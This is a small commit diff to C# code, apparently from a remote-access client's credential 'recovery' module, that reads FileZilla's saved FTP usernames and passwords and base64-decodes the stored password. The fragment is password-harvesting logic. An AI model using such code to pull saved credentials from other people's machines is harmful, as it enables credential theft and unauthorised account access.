Fix FileZilla base64 decoding

This commit is contained in:
ubbelol 2016-07-17 17:14:44 +02:00
parent 3d885ae922
commit 8ef33f4d17
1 changed files with 1 additions and 1 deletions

View File

@ -40,7 +40,7 @@ namespace xClient.Core.Recovery.FtpClients
if (xmlNodeChild.Name == "User")
szUsername = xmlNodeChild.InnerText;
if (xmlNodeChild.Name == "Pass")
szPassword = xmlNodeChild.InnerText;
szPassword = Base64Decode(xmlNodeChild.InnerText);
}
data.Add(new RecoveredAccount